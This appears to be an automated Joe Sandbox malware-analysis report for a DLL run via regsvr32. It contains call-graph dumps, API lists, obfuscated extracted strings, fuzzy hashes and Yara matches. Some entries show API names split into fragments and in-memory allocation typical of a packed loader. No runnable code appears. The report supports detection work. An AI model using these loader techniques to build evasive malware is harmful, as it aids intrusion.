16520->16545 16525 7fef9d29b19 16522->16525 16524 7fef9d29bde 16524->16515 16525->16524 16546 7fef9d29360 LeaveCriticalSection 16525->16546 16527 7fef9d29f49 16526->16527 16528 7fef9d29f81 16527->16528 16529 7fef9d29f5b GetOEMCP 16527->16529 16530 7fef9d29f88 GetACP 16528->16530 16531 7fef9d29f79 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16528->16531 16529->16531 16530->16531 16531->16517 16533 7fef9d29f20 __initmbctable 2 API calls 16532->16533 16535 7fef9d2a028 16533->16535 16534 7fef9d2a039 __initmbctable 16538 7fef9d23280 __GSHandlerCheck 8 API calls 16534->16538 16535->16534 16536 7fef9d2a234 16535->16536 16537 
7fef9d2a08e __initmbctable 16535->16537 16536->16534 16540 7fef9d2a25d IsValidCodePage 16536->16540 16547 7fef9d2a5e0 GetCPInfo 16537->16547 16539 7fef9d2a470 16538->16539 16539->16520 16540->16534 16541 7fef9d2a27b GetCPInfo 16540->16541 16541->16534 16544 7fef9d2a295 __initmbctable 16541->16544 16543 7fef9d2a5e0 __initmbctable 19 API calls 16543->16534 16544->16543 16545->16519 16546->16524 16548 7fef9d2a61f 16547->16548 16556 7fef9d2a7dc 16547->16556 16551 7fef9d2f4d0 _CrtMemDumpAllObjectsSince_stat 3 API calls 16548->16551 16549 7fef9d23280 __GSHandlerCheck 8 API calls 16550 7fef9d2aa30 16549->16550 16550->16534 16552 7fef9d2a734 16551->16552 16558 7fef9d2ef00 16552->16558 16554 7fef9d2a788 16555 7fef9d2ef00 __initmbctable 7 API calls 16554->16555 16555->16556 16556->16549 16557 7fef9d2a80a 16556->16557 16557->16534 16559 7fef9d2ef2c _CrtMemDumpAllObjectsSince 16558->16559 16562 7fef9d2efb0 16559->16562 16561 7fef9d2ef8e _LocaleUpdate::~_LocaleUpdate 16561->16554 16563 7fef9d2efd4 __initmbctable 16562->16563 16564 7fef9d2f068 MultiByteToWideChar 16563->16564 16567 7fef9d2f0ac malloc _MarkAllocaS 16564->16567 16570 7fef9d2f0a5 _CrtMemDumpAllObjectsSince_stat 16564->16570 16565 7fef9d2f122 MultiByteToWideChar 16566 7fef9d2f164 LCMapStringW 16565->16566 16565->16570 16568 7fef9d2f1a8 16566->16568 16566->16570 16567->16565 16567->16570 16569 7fef9d2f1b8 16568->16569 16576 7fef9d2f222 malloc _MarkAllocaS 16568->16576 16569->16570 16571 7fef9d2f1d9 LCMapStringW 16569->16571 16570->16561 16571->16570 16572 7fef9d2f2ac LCMapStringW 16572->16570 16573 7fef9d2f2ea 16572->16573 16574 7fef9d2f341 WideCharToMultiByte 16573->16574 16575 7fef9d2f2f4 WideCharToMultiByte 16573->16575 16574->16570 16575->16570 16576->16570 16576->16572 18652 7fef9d312e3 LoadLibraryW 18653 7fef9d31304 GetProcAddress 18652->18653 18661 7fef9d312fd 18652->18661 18654 7fef9d3132a 7 API calls 18653->18654 18653->18661 18655 7fef9d313b3 GetProcAddress EncodePointer 18654->18655 18656 7fef9d313d5 
FreeEnvironmentStringsW 16423->16425 16426 7fef9d28733 16423->16426 16425->16422 16426->16425 16427 7fef9d2876e WideCharToMultiByte 16426->16427 16428 7fef9d287c2 FreeEnvironmentStringsW 16427->16428 16429 7fef9d287aa 16427->16429 16428->16422 16429->16428 17330 7fef9d3e16f 17331 7fef9d3e17c _CrtMemDumpAllObjectsSince wcsxfrm get_int64_arg 17330->17331 17332 7fef9d3eadf 17331->17332 17342 7fef9d3da75 17331->17342 17353 7fef9d3eec0 17331->17353 17357 7fef9d3ef10 17332->17357 17335 7fef9d3eafd 17336 7fef9d3eb33 17335->17336 17340 7fef9d3eec0 25 API calls 17335->17340 17337 7fef9d3ec29 17336->17337 17351 7fef9d3eb49 _CrtMemDumpAllObjectsSince 17336->17351 17338 7fef9d3ebda 17337->17338 17339 7fef9d3ef10 25 API calls 17337->17339 17338->17342 17344 7fef9d3eec0 25 API calls 17338->17344 17339->17338 17340->17336 17341 7fef9d3eca1 17343 7fef9d2bd70 _invalid_parameter 17 API calls 17341->17343 17345 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 17341->17345 17342->17341 17347 7fef9d3dbb5 17342->17347 17343->17345 17344->17342 17346 7fef9d23280 __GSHandlerCheck 8 API calls 17345->17346 17348 7fef9d3ed9e 17346->17348 17350 7fef9d2bd70 _invalid_parameter 17 API calls 17347->17350 17350->17345 17351->17338 17361 7fef9d3f000 17351->17361 17368 7fef9d3ee40 17351->17368 17354 7fef9d3eed7 17353->17354 17355 7fef9d3ef07 17354->17355 17356 7fef9d3ee40 25 API calls 17354->17356 17355->17332 17356->17354 17358 7fef9d3ef2c 17357->17358 17359 7fef9d3ef4d 17358->17359 17360 7fef9d3ee40 25 API calls 17358->17360 17359->17335 17360->17358 17362 7fef9d3f026 _CrtMemDumpAllObjectsSince wcsxfrm 17361->17362 17364 7fef9d3f031 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 17361->17364 17363 7fef9d3f276 _CrtMemDumpAllObjectsSince 17362->17363 17362->17364 17365 7fef9d3f146 _CrtMemDumpAllObjectsSince 17362->17365 17366 7fef9d3f29d MultiByteToWideChar 17363->17366 17364->17351 17365->17364 17367 7fef9d3f1b5 MultiByteToWideChar 17365->17367 17366->17364 17367->17364 17369 7fef9d3ee62 
17368->17369 17370 7fef9d3ee6e 17369->17370 17372 7fef9d3f360 17369->17372 17370->17351 17373 7fef9d3f719 17372->17373 17374 7fef9d3f399 17372->17374 17376 7fef9d40170 23 API calls 17373->17376 17407 7fef9d3f4f2 17373->17407 17375 7fef9d3afb0 _fflush_nolock 17 API calls 17374->17375 17377 7fef9d3f3a6 17375->17377 17376->17407 17379 7fef9d3f3ed 17377->17379 17381 7fef9d3afb0 _fflush_nolock 17 API calls 17377->17381 17378 7fef9d23280 __GSHandlerCheck 8 API calls 17380 7fef9d3f7c5 17378->17380 17382 7fef9d3f4c7 17379->17382 17384 7fef9d3afb0 _fflush_nolock 17 API calls 17379->17384 17380->17370 17383 7fef9d3f3b8 17381->17383 17385 7fef9d40170 23 API calls 17382->17385 17382->17407 17383->17379 17387 7fef9d3afb0 _fflush_nolock 17 API calls 17383->17387 17386 7fef9d3f43d 17384->17386 17385->17407 17388 7fef9d3f484 17386->17388 17390 7fef9d3afb0 _fflush_nolock 17 API calls 17386->17390 17389 7fef9d3f3ca 17387->17389 17388->17382 17393 7fef9d3f561 17388->17393 17391 7fef9d3afb0 _fflush_nolock 17 API calls 17389->17391 17392 7fef9d3f44f 17390->17392 17391->17379 17392->17388 17396 7fef9d3afb0 _fflush_nolock 17 API calls 17392->17396 17394 7fef9d3afb0 _fflush_nolock 17 API calls 17393->17394 17395 7fef9d3f56e 17394->17395 17397 7fef9d3f5b8 17395->17397 17399 7fef9d3afb0 _fflush_nolock 17 API calls 17395->17399 17398 7fef9d3f461 17396->17398 17397->17373 17402 7fef9d3f604 17397->17402 17400 7fef9d3afb0 _fflush_nolock 17 API calls 17398->17400 17401 7fef9d3f580 17399->17401 17400->17388 17401->17397 17404 7fef9d3afb0 _fflush_nolock 17 API calls 17401->17404 17403 7fef9d3b530 wctomb_s 19 API calls 17402->17403 17403->17407 17405 7fef9d3f592 17404->17405 17406 7fef9d3afb0 _fflush_nolock 17 API calls 17405->17406 17406->17397 17407->17378 18407 7fef9d41370 18408 7fef9d3af60 _unlock_file2 2 API calls 18407->18408 18409 7fef9d41390 18408->18409 16577 7fef9d28860 HeapCreate 16578 7fef9d28891 GetVersion 16577->16578 16579 7fef9d2888d 16577->16579 16580 7fef9d288c1 16578->16580 16581 
7fef9d288a7 HeapSetInformation 16578->16581 16580->16579 16581->16580 18410 7fef9d31b64 18411 7fef9d31b9d 18410->18411 18412 7fef9d3ab10 17 API calls 18411->18412 18413 7fef9d31c86 18411->18413 18415 7fef9d31bed 18411->18415 18412->18413 18414 7fef9d39290 23 API calls 18413->18414 18413->18415 18414->18415 18842 7fef9d35260 18843 7fef9d35296 __SehTransFilter _CreateFrameInfo 18842->18843 18844 7fef9d2ed30 _FindAndUnlinkFrame 36 API calls 18843->18844 18845 7fef9d353e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 18844->18845 17408 7fef9d41160 17411 7fef9d34e90 17408->17411 17410 7fef9d41179 17412 7fef9d34ebb 17411->17412 17413 7fef9d34ecf 17411->17413 17412->17413 17414 7fef9d2cf50 terminate 35 API calls 17412->17414 17413->17410 17414->17413 18423 7fef9d3bb66 18424 7fef9d3bb78 _CrtMemDumpAllObjectsSince wcsxfrm 18423->18424 18425 7fef9d3bc46 18424->18425 18427 7fef9d3b99c 18424->18427 18426 7fef9d2bd70 _invalid_parameter 17 API calls 18425->18426 18430 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18426->18430 18428 7fef9d3cc93 18427->18428 18432 7fef9d3bada 18427->18432 18429 7fef9d2bd70 _invalid_parameter 17 API calls 18428->18429 18428->18430 18429->18430 18431 7fef9d23280 __GSHandlerCheck 8 API calls 18430->18431 18433 7fef9d3cd90 18431->18433 18434 7fef9d2bd70 _invalid_parameter 17 API calls 18432->18434 18434->18430

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: AllocAllocateExitFreeHeapLibraryLoadMessageProcessTaskVirtual
                                                      • String ID: %<$Ya]$g@$$|X$ 4bB$!@C+$"V2$#z$U$$931$$:*:$$D1v$$huN$$}%z$%8#$%</$%U9$&\hR$*hH%$+ong$+iT$-{*$-'C$.#($0kj.$0.3$1\u$2s<S$3ob$5qj'$5vCx$8<-$:!@$:'U@$:9m?$;qdf$<)@P$<M}O$<v:$=kf^$>~$?CE`$@ $BxJr$C/$Cb47$D)'U$Eekg$FLIn$HPZ$Ko*h$L ]1$M13U$M1vi$MDj$N1kj^H<M1vf@$_yiXP+o*hH*fZQl5vC5qjfXErgxjcCb4v_e75<edkge!z$U9k+h$P+oo$PX5$Puvm$QlyO$R;pB$S[L$S}pn$U+on$U9#($V#s$V9s$VO4$^*C$`AnM$aUJ'$c-_j$cDj$e7tc$ePO$gVWH$h78<$hx"$j+h$kxfc$l|f$mCl4$mbPv$pAT#$rkE@$t(O$tc`$w&ed$wC54$werfault.exe$wk/$xA\#${$U|${fM$$|e:$} z$$}'6$}WL$It$"!k$%Uc$(pd$*hH$,$n$,1.$9[+$?x?$EBg$M z$N3$Pl5$i~e$jfX$oE$`I
                                                      • API String ID: 2181984824-2032897877
                                                      • Opcode ID: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                      • Instruction ID: 1e3beb4b4c43f569e156fbbbb3a48c6786d138466eab30fa5612b4063b7ac052
                                                      • Opcode Fuzzy Hash: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                      • Instruction Fuzzy Hash: 72E2C9B690A7C18FE3748F629E857DD3AA0F345748F609208D3991FA1DCB795242CF86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.935681407.0000000000140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00140000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_140000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                      • API String ID: 2313188843-2517549848
                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                      • Instruction ID: d533c7888e8ad47428c32e48e704199737e10f3c0956cb83534593ac496a38be
                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                      • Instruction Fuzzy Hash: 6E72D530618B488BDB29DF19C8856B9B7E1FB98305F10462DE9CFC7211DB34D986CB86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $E$&C$b $z_o^$]o-
                                                      • API String ID: 0-182765021
                                                      • Opcode ID: fd2830ddd061059d70b3ed5c5ef2773e5c4c00071749e16c1f80641060217d81
                                                      • Instruction ID: b82cae2a5c5b3167ef3d8ad315f999371e1e8449cd72bf967428ee4211bfb190
                                                      • Opcode Fuzzy Hash: fd2830ddd061059d70b3ed5c5ef2773e5c4c00071749e16c1f80641060217d81
                                                      • Instruction Fuzzy Hash: 5CE1277151468CDFDF88DF28C889ADD3BA1FB483A8F956219FD0A97250D774D888CB84
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8$?I $k?@`${>K$s
                                                      • API String ID: 0-923624899
                                                      • Opcode ID: 59fac920170ce31af9fc739010187020a0354a51edcd4550f4f509655bae4bf8
                                                      • Instruction ID: ebffd08f5432af4d9268e2276ec0df8890e8c351c8fd12e1d0a52c84a5ba0a07
                                                      • Opcode Fuzzy Hash: 59fac920170ce31af9fc739010187020a0354a51edcd4550f4f509655bae4bf8
                                                      • Instruction Fuzzy Hash: F4C1F070519784ABC388DF24C4CA95BBBF1FBD4758F906A1CF9C68A260D774D948CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &k8$,8$\$`/U
                                                      • API String ID: 0-956392518
                                                      • Opcode ID: 342d408fbb0085f8b5c961c7b7314e28d99ae80dc1fdc32ae007dfb548a83613
                                                      • Instruction ID: eb6f1617cd975c6e10cf27e40abea16f203efbb492656816d2660eb5cb9ff966
                                                      • Opcode Fuzzy Hash: 342d408fbb0085f8b5c961c7b7314e28d99ae80dc1fdc32ae007dfb548a83613
                                                      • Instruction Fuzzy Hash: 7D2215715093C88BDBBECF64C889BDA7BB9FB44708F10561CEA4A9E258DB745748CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • HeapCreate.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D28876
                                                      • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D28891
                                                      • HeapSetInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D288BB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Heap$CreateInformationVersion
                                                      • String ID:
                                                      • API String ID: 3563531100-0
                                                      • Opcode ID: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                                      • Instruction ID: 9235811b63a60011062a1442a231d54292fe2d432e51c42db702af6c27d11e97
                                                      • Opcode Fuzzy Hash: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                                      • Instruction Fuzzy Hash: 50F0FE74A18A4282F7949729AC0977E63D0B758345FA1C43696CD826B4DF3F9589C601
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6"*n$US8$z:7
                                                      • API String ID: 0-1851205513
                                                      • Opcode ID: 1606357dec85794d189ee26d92c7f71c49412cbd8f38d505c9803facb48510e7
                                                      • Instruction ID: 607295142d9547307d046de48b3748fa472aee76cf77032a28cf9f5936a2d7e5
                                                      • Opcode Fuzzy Hash: 1606357dec85794d189ee26d92c7f71c49412cbd8f38d505c9803facb48510e7
                                                      • Instruction Fuzzy Hash: 57E1F9706057889FEBBADF24C88A7DE7BA1FB49744F50422DDC8A8E250DB745648CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -;$-;$00
                                                      • API String ID: 0-2539125404
                                                      • Opcode ID: affc7f65c819fab80511788a3c6ad3e3eeb13df79fc80a7c79ea60dae88b3546
                                                      • Instruction ID: 193f60ccd2842279d11af0df6a42cb9b90b2b7ab7c379db6368ea7840d008f1f
                                                      • Opcode Fuzzy Hash: affc7f65c819fab80511788a3c6ad3e3eeb13df79fc80a7c79ea60dae88b3546
                                                      • Instruction Fuzzy Hash: 28A1377051478CDBDBAADF28C8C9AD93BA1FF48394FA05219FD0287251CB75D985CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: f+hb$zm
                                                      • API String ID: 0-4294548274
                                                      • Opcode ID: 6963b25ea24f854b6089165216e044e7a65ef6823e0c7b2cadf5353a03fffeac
                                                      • Instruction ID: b2f4f577a3df5b024e80de80ecfd692f42b94ed80d4232126a84951cd6e5a716
                                                      • Opcode Fuzzy Hash: 6963b25ea24f854b6089165216e044e7a65ef6823e0c7b2cadf5353a03fffeac
                                                      • Instruction Fuzzy Hash: 4852C97050068D8FDF98DF68C8866DA3BA1FB58388F124319FC8AA7291D778D655CBC4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #U6
                                                      • API String ID: 0-3443268899
                                                      • Opcode ID: e6a0a67d4c68fd780a130b425ea3d31e719d89ab7dc9c3de49232e364b014bec
                                                      • Instruction ID: 59d24509ec93e958c93c94dd97d6e32fc772fd919bc53da4f0cdd3954875abf9
                                                      • Opcode Fuzzy Hash: e6a0a67d4c68fd780a130b425ea3d31e719d89ab7dc9c3de49232e364b014bec
                                                      • Instruction Fuzzy Hash: 57510E715087888BC7B8DF28C49A6CBBBF1FF86344F10091DE68987260CB76D949CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _calloc_dbg$InfoStartup_calloc_dbg_impl
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                                      • API String ID: 1930727954-3864165772
                                                      • Opcode ID: 6ce8cb6e1d9cf3b4bca9567c45291f9c0e6eb32f85ec4de2f3338e3031d5b08d
                                                      • Instruction ID: 1d91a8b9fbbdfe7efb2cec2f51c290a43986955e3ccc02e10ec1e86e5f3f07e0
                                                      • Opcode Fuzzy Hash: 6ce8cb6e1d9cf3b4bca9567c45291f9c0e6eb32f85ec4de2f3338e3031d5b08d
                                                      • Instruction Fuzzy Hash: 88F1D82260DBC5C9E7B08B19E88076EB7A0F385B64F258226CAED477E4DB3DD445CB11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _calloc_dbg$__initmbctable_invalid_parameter_invoke_watson_if_error
                                                      • String ID: _setenvp$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$strcpy_s(*env, cchars, p)$~
                                                      • API String ID: 1648969265-681193798
                                                      • Opcode ID: a4493985eb34f23491eb94dc9b506d74831480b604230057d9b95ae3580ffa29
                                                      • Instruction ID: 6f04160d34b6c1fe028a5367eccc3c8ebf9b699179af2d046024218ded9634d0
                                                      • Opcode Fuzzy Hash: a4493985eb34f23491eb94dc9b506d74831480b604230057d9b95ae3580ffa29
                                                      • Instruction Fuzzy Hash: 14514F31A1DB8682EB90CB19E88576E77E0F385794F704126EACE477B4DB7EE4408B41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Pointer$Decode$_initterm$EncodeExitProcess__crt
                                                      • String ID:
                                                      • API String ID: 3799933513-0
                                                      • Opcode ID: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                      • Instruction ID: 37cfb5e84e154ae2fbcc5f75e30e47dd1cf7b4373ba061ec72f9a9691eeac49a
                                                      • Opcode Fuzzy Hash: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                      • Instruction Fuzzy Hash: 36511C3291DB4281E6A09B58EC8436EB7E0F386794F315125EACD427B9DF7EE544CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\a_env.c
                                                      • API String ID: 1823725401-2473407871
                                                      • Opcode ID: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                      • Instruction ID: f3219d0a3466b597a7d077589c81ae53176584dcfccb647f84a4fae4f36a6977
                                                      • Opcode Fuzzy Hash: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                      • Instruction Fuzzy Hash: B141A536618B8586E794CB56F84432FB7E1F785B94F200429EBCD47BA8DBBED4448B00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 000007FEF9D27540: _initp_misc_winsig.LIBCMTD ref: 000007FEF9D2757B
                                                        • Part of subcall function 000007FEF9D27540: _initp_eh_hooks.LIBCMTD ref: 000007FEF9D27585
                                                        • Part of subcall function 000007FEF9D28FE0: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000007FEF9D2906F
                                                      • FlsAlloc.KERNEL32 ref: 000007FEF9D23D55
                                                        • Part of subcall function 000007FEF9D23E00: FlsFree.KERNEL32 ref: 000007FEF9D23E13
                                                        • Part of subcall function 000007FEF9D23E00: _mtdeletelocks.LIBCMTD ref: 000007FEF9D23E23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: AllocCountCriticalFreeInitializeSectionSpin_initp_eh_hooks_initp_misc_winsig_mtdeletelocks
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tidtable.c
                                                      • API String ID: 3828364660-3898981997
                                                      • Opcode ID: 433987b36a956229ec77e0de1d2b7e358b1fb906a8f620ef815ae1dd4af6a87a
                                                      • Instruction ID: 54e8e70dd377f15c5e8b83e2f7140eab641006b368099d9e1d163193fdf976c7
